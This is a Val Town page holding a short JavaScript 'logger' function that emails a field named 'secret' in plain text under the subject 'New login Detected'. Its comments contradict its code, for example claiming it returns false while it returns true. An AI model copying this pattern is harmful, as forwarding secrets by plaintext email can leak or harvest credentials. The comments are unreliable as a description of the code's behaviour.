1
2
3
4
5
6
7
8
9
import { email } from "https://esm.town/v/std/email";
export function logger(data) {
// Site is not approved, send an email
let subject = "New login Detected";
let body = `DATA: ${data.secret}.`;
email({ subject: subject, text: body });
return true; // Return false as the site is not approved
}
Val Town is a social website to write and deploy JavaScript.
Build APIs and schedule functions from your browser.
Comments
Nobody has commented on this val yet: be the first!
December 11, 2023